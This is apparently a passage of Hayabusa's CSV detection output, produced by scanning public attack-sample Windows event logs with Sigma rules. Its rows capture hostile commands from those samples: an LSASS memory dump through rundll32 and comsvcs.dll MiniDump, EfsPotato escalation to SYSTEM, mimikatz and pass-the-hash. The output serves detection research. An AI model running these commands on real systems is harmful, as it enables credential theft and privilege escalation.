Access/CA_PetiPotam_etw_rpc_efsr_5_6.evtx +2021-08-17 21:26:51.409 +09:00,LAPTOP-JU4M3I0E,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_PetiPotam_etw_rpc_efsr_5_6.evtx +2021-08-17 21:26:51.409 +09:00,LAPTOP-JU4M3I0E,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_PetiPotam_etw_rpc_efsr_5_6.evtx +2021-08-17 21:26:51.409 +09:00,LAPTOP-JU4M3I0E,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_PetiPotam_etw_rpc_efsr_5_6.evtx +2021-08-17 21:26:51.409 +09:00,LAPTOP-JU4M3I0E,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_PetiPotam_etw_rpc_efsr_5_6.evtx +2021-08-17 21:26:51.409 +09:00,LAPTOP-JU4M3I0E,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_PetiPotam_etw_rpc_efsr_5_6.evtx +2021-08-17 21:26:51.409 +09:00,LAPTOP-JU4M3I0E,9,medium,Raw Disk Access Using Illegitimate Tools,,rules/sigma/raw_access_thread/sysmon_raw_disk_access_using_illegitimate_tools.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_PetiPotam_etw_rpc_efsr_5_6.evtx +2021-08-23 04:33:38.725 +09:00,LAPTOP-JU4M3I0E,1,informational,Process Creation,"Command: c:\temp\EfsPotato.exe whoami : Path: C:\temp\EfsPotato.exe : User: NT AUTHORITY\NETWORK SERVICE : Parent Command: ""cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege 
Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx +2021-08-23 04:33:38.844 +09:00,LAPTOP-JU4M3I0E,17,critical,EfsPotato Named Pipe,,rules/sigma/pipe_created/sysmon_efspotato_namedpipe.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx +2021-08-23 04:33:38.884 +09:00,LAPTOP-JU4M3I0E,18,critical,EfsPotato Named Pipe,,rules/sigma/pipe_created/sysmon_efspotato_namedpipe.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx +2021-08-23 04:33:38.905 +09:00,LAPTOP-JU4M3I0E,1,informational,Process Creation,Command: whoami : Path: C:\Windows\System32\whoami.exe : User: NT AUTHORITY\SYSTEM : Parent Command: c:\temp\EfsPotato.exe whoami,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx +2021-08-23 04:33:38.905 +09:00,LAPTOP-JU4M3I0E,1,high,Run Whoami as SYSTEM,,rules/sigma/process_creation/win_whoami_as_system.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx +2021-08-23 04:33:38.905 +09:00,LAPTOP-JU4M3I0E,1,medium,Whoami Execution,,rules/sigma/process_creation/win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx +2021-08-23 04:33:38.905 +09:00,LAPTOP-JU4M3I0E,1,low,Local Accounts Discovery,,rules/sigma/process_creation/win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx +2021-08-23 04:33:38.905 +09:00,LAPTOP-JU4M3I0E,1,high,Whoami Execution Anomaly,,rules/sigma/process_creation/win_susp_whoami_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege 
Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx +2021-08-23 04:33:52.250 +09:00,LAPTOP-JU4M3I0E,1,informational,Process Creation,"Command: ""C:\Users\bouss\AppData\Local\Microsoft\OneDrive\21.139.0711.0001\FileCoAuth.exe"" -Embedding : Path: C:\Users\bouss\AppData\Local\Microsoft\OneDrive\21.139.0711.0001\FileCoAuth.exe : User: LAPTOP-JU4M3I0E\bouss : Parent Command: C:\WINDOWS\system32\svchost.exe -k DcomLaunch -p",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx +2021-10-19 23:33:13.262 +09:00,FS03.offsec.lan,1102,high,Security log was cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1201-Password Policy Discovery/ID4688-Password policy discovery via commandline.evtx +2021-10-19 23:40:28.001 +09:00,FS03.offsec.lan,1102,high,Security log was cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4688-Group discovery via commandline.evtx +2021-10-19 23:42:41.218 +09:00,FS03.offsec.lan,4728,medium,User added to global security group,Member added: - : SID: S-1-5-21-3410678313-1251427014-1131291384-1004 : Group: None : Subject user: admmig : Subject domain: OFFSEC,rules/hayabusa/default/alerts/Security/4728_AccountManipulation_UserAddedToGlobalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1136-Create account/ID4688-User creation via commandline.evtx +2021-10-19 23:42:41.234 +09:00,FS03.offsec.lan,4720,medium,Local user account created,User: toto3 : 
SID:S-1-5-21-3410678313-1251427014-1131291384-1004,rules/hayabusa/default/alerts/Security/4720_CreateAccount-LocalAccount_UserAccountCreated.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1136-Create account/ID4688-User creation via commandline.evtx +2021-10-19 23:44:30.780 +09:00,FS03.offsec.lan,1102,high,Security log was cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID4688-Network share discovery or connection via commandline.evtx +2021-10-19 23:45:16.394 +09:00,FS03.offsec.lan,1102,high,Security log was cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688-Network share manipulation via commandline.evtx +2021-10-20 22:39:12.731 +09:00,FS03.offsec.lan,1102,high,Security log was cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1550-Use Alternate Authentication Material/ID4624-Mimikatz Pass the hash.evtx +2021-10-20 22:39:17.315 +09:00,FS03.offsec.lan,4624,informational,Logon Type 9 - NewCredentials,User: admmig : Workstation: - : IP Address: ::1 : Port: 0 : LogonID: 0x266e045 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-9-NewInteractive.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1550-Use Alternate Authentication Material/ID4624-Mimikatz Pass the hash.evtx +2021-10-20 22:39:17.315 +09:00,FS03.offsec.lan,4672,informational,Admin Logon,User: admmig : LogonID: 
0x266e045,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1550-Use Alternate Authentication Material/ID4624-Mimikatz Pass the hash.evtx +2021-10-20 22:39:17.315 +09:00,FS03.offsec.lan,4624,medium,Pass the Hash Activity 2,,rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1550-Use Alternate Authentication Material/ID4624-Mimikatz Pass the hash.evtx +2021-10-20 22:39:17.315 +09:00,FS03.offsec.lan,4624,high,Successful Overpass the Hash Attempt,,rules/sigma/builtin/security/win_overpass_the_hash.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1550-Use Alternate Authentication Material/ID4624-Mimikatz Pass the hash.evtx +2021-10-20 22:39:21.730 +09:00,FS03.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Sysmon\desktop.ini : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1550-Use Alternate Authentication Material/ID4624-Mimikatz Pass the hash.evtx +2021-10-20 23:18:55.808 +09:00,FS03.offsec.lan,1,high,Process Creation Sysmon Rule Alert,"Rule: technique_id=T1086,technique_name=PowerShell : Command: powershell.exe -NoP -C ""C:\Windows\System32\rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump (Get-Process lsass).Id \Windows\Temp\76nivOxA.dmp full;Wait-Process -Id (Get-Process rundll32).id"" : Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe : User: OFFSEC\admmig : Parent Command: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx +2021-10-20 23:18:55.808 
+09:00,FS03.offsec.lan,1,high,Wmiprvse Spawning Process,,rules/sigma/process_creation/win_wmiprvse_spawning_process.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx +2021-10-20 23:18:55.808 +09:00,FS03.offsec.lan,1,high,WMI Spawning Windows PowerShell,,rules/sigma/process_creation/win_wmi_spwns_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx +2021-10-20 23:18:55.808 +09:00,FS03.offsec.lan,1,low,Non Interactive PowerShell,,rules/sigma/process_creation/win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx +2021-10-20 23:18:55.808 +09:00,FS03.offsec.lan,1,high,PowerShell Get-Process LSASS,,rules/sigma/process_creation/win_susp_powershell_getprocess_lsass.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx +2021-10-20 23:18:55.808 +09:00,FS03.offsec.lan,1,high,Suspicious PowerShell Parent Process,,rules/sigma/process_creation/win_susp_powershell_parent_process.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx +2021-10-20 23:18:55.808 +09:00,FS03.offsec.lan,1,high,LSASS Memory Dumping,,rules/sigma/process_creation/win_lsass_dump.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx +2021-10-20 23:18:55.808 +09:00,FS03.offsec.lan,1,high,Suspicious Script Execution From Temp Folder,,rules/sigma/process_creation/win_susp_script_exec_from_temp.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx +2021-10-20 23:18:56.089 
+09:00,FS03.offsec.lan,1,high,Process Creation Sysmon Rule Alert,"Rule: technique_id=T1086,technique_name=PowerShell : Command: ""C:\Windows\System32\rundll32.exe"" C:\Windows\System32\comsvcs.dll MiniDump 512 \Windows\Temp\76nivOxA.dmp full : Path: C:\Windows\System32\rundll32.exe : User: OFFSEC\admmig : Parent Command: powershell.exe -NoP -C ""C:\Windows\System32\rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump (Get-Process lsass).Id \Windows\Temp\76nivOxA.dmp full;Wait-Process -Id (Get-Process rundll32).id""",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx +2021-10-20 23:18:56.089 +09:00,FS03.offsec.lan,1,medium,Process Dump via Comsvcs DLL,,rules/sigma/process_creation/win_susp_comsvcs_procdump.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx +2021-10-20 23:18:56.105 +09:00,FS03.offsec.lan,10,high,LSASS Memory Dump,,rules/sigma/process_access/sysmon_lsass_memdump.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx +2021-10-20 23:18:56.105 +09:00,FS03.offsec.lan,10,critical,Lsass Memory Dump via Comsvcs DLL,,rules/sigma/process_access/sysmon_lsass_dump_comsvcs_dll.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx +2021-10-20 23:29:09.758 +09:00,FS03.offsec.lan,4672,informational,Admin Logon,User: admmig : LogonID: 0x26bdfac,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx +2021-10-20 23:29:09.758 +09:00,FS03.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : 
IP Address: 10.23.123.11 : Port: 49192 : LogonID: 0x26bdfac,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx +2021-10-20 23:29:09.773 +09:00,FS03.offsec.lan,4672,informational,Admin Logon,User: admmig : LogonID: 0x26bdfde,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx +2021-10-20 23:29:09.773 +09:00,FS03.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.123.11 : Port: 38940 : LogonID: 0x26bdfde,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx +2021-10-20 23:29:09.836 +09:00,FS03.offsec.lan,4672,informational,Admin Logon,User: admmig : LogonID: 0x26be000,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx +2021-10-20 23:29:09.836 +09:00,FS03.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.123.11 : Port: 54742 : LogonID: 0x26be000,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx +2021-10-20 23:29:09.898 +09:00,FS03.offsec.lan,4672,informational,Admin Logon,User: admmig : LogonID: 0x26be01f,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump 
with LSASSY (process).evtx +2021-10-20 23:29:09.898 +09:00,FS03.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.123.11 : Port: 54742 : LogonID: 0x26be01f,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx +2021-10-20 23:29:09.961 +09:00,FS03.offsec.lan,4672,informational,Admin Logon,User: admmig : LogonID: 0x26be03c,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx +2021-10-20 23:29:09.961 +09:00,FS03.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.123.11 : Port: 54742 : LogonID: 0x26be03c,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx +2021-10-20 23:29:10.214 +09:00,FS03.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\Temp\2V7Be7Gq.dmp : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx +2021-10-20 23:29:10.214 +09:00,FS03.offsec.lan,5145,medium,Suspicious Access to Sensitive File Extensions,,rules/sigma/builtin/security/win_susp_raccess_sensitive_fext.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx +2021-10-20 23:29:10.542 +09:00,FS03.offsec.lan,4656,critical,LSASS Access from Non System 
Account,,rules/sigma/builtin/security/win_lsass_access_non_system_account.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx +2021-10-20 23:29:10.542 +09:00,FS03.offsec.lan,4656,high,Generic Password Dumper Activity on LSASS,,rules/sigma/builtin/security/win_susp_lsass_dump_generic.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx +2021-10-20 23:29:11.230 +09:00,FS03.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\Temp\2V7Be7Gq.dmp : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx +2021-10-20 23:29:11.230 +09:00,FS03.offsec.lan,5145,medium,Suspicious Access to Sensitive File Extensions,,rules/sigma/builtin/security/win_susp_raccess_sensitive_fext.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx +2021-10-20 23:29:12.553 +09:00,FS03.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\Temp\2V7Be7Gq.dmp : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx +2021-10-20 23:29:12.553 +09:00,FS03.offsec.lan,5145,medium,Suspicious Access to Sensitive File Extensions,,rules/sigma/builtin/security/win_susp_raccess_sensitive_fext.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx 
+2021-10-20 23:29:13.725 +09:00,FS03.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Sysmon\desktop.ini : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx +2021-10-20 23:29:22.291 +09:00,FS03.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Sysmon\desktop.ini : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx +2021-10-20 23:39:26.349 +09:00,FS03.offsec.lan,4104,high,Suspicious PowerShell Keywords,,rules/sigma/powershell/powershell_script/powershell_suspicious_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID800-4103-4104-LSASS dump with LSASSY (PowerShell).evtx +2021-10-20 23:39:26.349 +09:00,FS03.offsec.lan,4104,high,PowerShell Get-Process LSASS in ScriptBlock,,rules/sigma/powershell/powershell_script/powershell_suspicious_getprocess_lsass.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID800-4103-4104-LSASS dump with LSASSY (PowerShell).evtx +2021-10-22 01:27:02.319 +09:00,LAPTOP-JU4M3I0E,1,informational,Process Creation,"Command: cscript.exe //e:jscript testme.js : Path: C:\Windows\System32\cscript.exe : User: LAPTOP-JU4M3I0E\bouss : Parent Command: ""C:\Windows\System32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_zipexec.evtx +2021-10-22 01:27:02.319 +09:00,LAPTOP-JU4M3I0E,1,medium,WSF/JSE/JS/VBA/VBE File 
Execution,,rules/sigma/process_creation/win_susp_script_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_zipexec.evtx +2021-10-22 01:27:02.999 +09:00,LAPTOP-JU4M3I0E,1,informational,Process Creation,"Command: ""C:\Windows\System32\cmdkey.exe"" /generic:Microsoft_Windows_Shell_ZipFolder:filename=C:\Users\bouss\AppData\Local\Temp\lync.zip /pass:tWIMmIF /user:"""" : Path: C:\Windows\System32\cmdkey.exe : User: LAPTOP-JU4M3I0E\bouss : Parent Command: cscript.exe //e:jscript testme.js",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_zipexec.evtx +2021-10-22 01:27:02.999 +09:00,LAPTOP-JU4M3I0E,1,medium,Suspicious ZipExec Execution,,rules/sigma/process_creation/win_pc_susp_zipexec.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_zipexec.evtx +2021-10-22 01:27:12.858 +09:00,LAPTOP-JU4M3I0E,1,informational,Process Creation,"Command: ""C:\Users\bouss\AppData\Local\Temp\Temp3_lync.zip\i.exe"" : Path: C:\Users\bouss\AppData\Local\Temp\Temp3_lync.zip\i.exe : User: LAPTOP-JU4M3I0E\bouss : Parent Command: cscript.exe //e:jscript testme.js",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_zipexec.evtx +2021-10-22 01:27:12.946 +09:00,LAPTOP-JU4M3I0E,1,informational,Process Creation,"Command: ""C:\Windows\System32\cmdkey.exe"" /delete Microsoft_Windows_Shell_ZipFolder:filename=C:\Users\bouss\AppData\Local\Temp\lync.zip : Path: C:\Windows\System32\cmdkey.exe : User: LAPTOP-JU4M3I0E\bouss : Parent Command: cscript.exe //e:jscript testme.js",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_zipexec.evtx +2021-10-22 01:27:12.946 +09:00,LAPTOP-JU4M3I0E,1,medium,Suspicious ZipExec Execution,,rules/sigma/process_creation/win_pc_susp_zipexec.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_zipexec.evtx +2021-10-22 01:27:14.015 
+09:00,LAPTOP-JU4M3I0E,1,informational,Process Creation,"Command: ""C:\Program Files\Elastic\Endpoint\elastic-endpoint.exe"" popup ""Malicious Behavior Detection Alert"" ""Elastic Security detected Execution via Renamed Signed Binary Proxy"" ""C:\Program Files\Elastic\Endpoint\cache\resources\elastic-endpoint-security.png"" : Path: C:\Program Files\Elastic\Endpoint\elastic-endpoint.exe : User: LAPTOP-JU4M3I0E\bouss : Parent Command: ""C:\Program Files\Elastic\Endpoint\elastic-endpoint.exe"" run",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_zipexec.evtx +2021-10-22 02:38:36.711 +09:00,FS03.offsec.lan,4104,medium,Windows PowerShell Web Request,,rules/sigma/powershell/powershell_script/powershell_web_request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1197-BITS jobs/ID800-4103-4104-PowerShell BITS job started.evtx +2021-10-22 02:53:42.530 +09:00,FS03.offsec.lan,59,informational,Bits Job Creation,Job Title: BITS Transfer : URL: https://releases.ubuntu.com/20.04.3/ubuntu-20.04.3-desktop-amd64.iso,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1197-BITS jobs/ID60-High volume file downloaded with BITS.evtx +2021-10-22 05:40:12.867 +09:00,FS03.offsec.lan,1,high,Process Creation Sysmon Rule Alert,"Rule: technique_id=T1059,technique_name=Command-Line Interface : Command: mimikatz.exe : Path: C:\TOOLS\Mimikatzx64\mimikatz.exe : User: OFFSEC\admmig : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1550-Use Alternate Authentication Material/ID10-Pass the hash Mimikatz memory access.evtx +2021-10-22 05:40:12.867 +09:00,FS03.offsec.lan,1,high,Relevant Anti-Virus 
Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1550-Use Alternate Authentication Material/ID10-Pass the hash Mimikatz memory access.evtx +2021-10-22 05:40:12.867 +09:00,FS03.offsec.lan,1,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1550-Use Alternate Authentication Material/ID10-Pass the hash Mimikatz memory access.evtx +2021-10-22 05:40:43.120 +09:00,FS03.offsec.lan,1,high,Process Creation Sysmon Rule Alert,"Rule: technique_id=T1059,technique_name=Command-Line Interface : Command: cmd.exe : Path: C:\Windows\System32\cmd.exe : User: NT AUTHORITY\SYSTEM : Parent Command: mimikatz.exe",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1550-Use Alternate Authentication Material/ID10-Pass the hash Mimikatz memory access.evtx +2021-10-22 05:40:43.120 +09:00,FS03.offsec.lan,1,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1550-Use Alternate Authentication Material/ID10-Pass the hash Mimikatz memory access.evtx +2021-10-22 05:40:43.120 +09:00,FS03.offsec.lan,1,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1550-Use Alternate Authentication Material/ID10-Pass the hash Mimikatz 